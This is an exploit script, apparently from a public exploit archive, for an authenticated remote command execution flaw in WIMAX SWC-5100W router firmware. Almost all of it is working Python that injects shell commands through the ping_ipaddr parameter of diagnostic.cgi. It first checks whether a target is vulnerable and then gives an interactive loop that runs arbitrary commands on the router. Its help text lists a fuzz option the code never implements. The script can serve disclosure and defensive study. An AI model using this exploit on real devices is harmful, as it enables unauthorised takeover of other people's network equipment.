Authored by Momen Eldawakhly

WIMAX SWC-5100W suffers from an authenticated remote command execution vulnerability.

# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE
# Vulnerability Name: Ballin' Mada
# Date: 4/3/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)
# Tested on: Unix
# CVE : Under registration

import requests
import random,argparse
import sys
from colorama import Fore
from bs4 import BeautifulSoup

red = Fore.RED
green = Fore.GREEN
cyan = Fore.CYAN
yellow = Fore.YELLOW
reset = Fore.RESET

argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--target", help="Target router")
argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true')
argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true')

args = argParser.parse_args()
target = args.target
rev = args.reverseShell
testX = args.testExploit


banner = """
____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____
||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a ||
||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||
|/__|/__|/__|/__|/__|/__|/__|/_______|/__|/__|/__|/__|
RCE 0day in WIMAX SWC-5100W
[ Spell the CGI as in Cyber Guy ]
"""
def checkEXP():
print(cyan + "[+] Checking if target is vulnerable" + reset)
art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']
request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None)
if request.status_code == 200:
print(green + "[+] Status code: 200 success" + reset)
soup = BeautifulSoup(request.text, 'html.parser')
if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"):
print(green + "[+] Target is vulnerable" + reset)
uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>";")
soup_validate = BeautifulSoup(uname.text, 'html.parser')
print(soup_validate.find(id="pwned").text)
else:
print(red + "[+] Seems to be not vulnerable" + reset)
else:
print(red + "[+] Status code: " + str(request.status_code) + reset)


def revShell():
cmd = input("CGI #:- ")
while cmd:
try:
print(cmd)
uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+"<a+id='result'>`{cmd}`</a>";")
resp = BeautifulSoup(uname.text, 'html.parser')
print(resp.find(id="result").text)
if cmd == "exit" or cmd == "quit":
print(yellow + "[*] Terminating ..." + reset)
sys.exit(0)
else:
return revShell()
except KeyboardInterrupt:
sys.exit(0)

def help():
print(
"""
[+] Example: python3 pwnMada.py -t 192.168.1.1 -rv

[*] -t, --target :: Specify target to attack.
[*] -rv, --reverseShell :: Obtain reverse shell.
[*] -tx, --testExploit :: Test the exploitability of the target.
[*] -fz, --fuzz :: Fuzz the target with arbitrary chars.
"""
)

if target and rev:
print(banner)
revShell()
elif target and testX:
print(banner)
checkEXP()
else:
print(banner)
argParser.print_help()